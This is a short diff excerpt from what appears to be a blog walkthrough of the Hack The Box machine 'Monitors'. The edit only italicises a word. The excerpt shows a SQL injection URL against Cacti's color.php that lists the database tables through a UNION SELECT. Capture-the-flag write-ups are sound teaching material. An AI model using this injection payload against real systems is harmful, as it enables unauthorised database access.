MateoNitro550/MateoNitro550.github.io/_posts/_en/2024-12-02-Monitors-Hack-The-Box.md

 ![36](https://raw.githubusercontent.com/MateoNitro550/MateoNitro550.github.io/main/assets/2024-10-21-Monitors-Hack-The-Box/36.png){:class="blog-image" onclick="expandImage(this)"}

-Now we are interested in listing all the tables in the database; for this, we will use the following payload:
+Now we are interested in listing all the tables in the database; for this, we will use the following _payload_:

 ```
 http://cacti-admin.monitors.htb/cacti/color.php?action=export&filter=1')+UNION+SELECT+NULL,table_name,NULL,NULL,NULL,NULL,NULL+FROM+information_schema.tables;--+-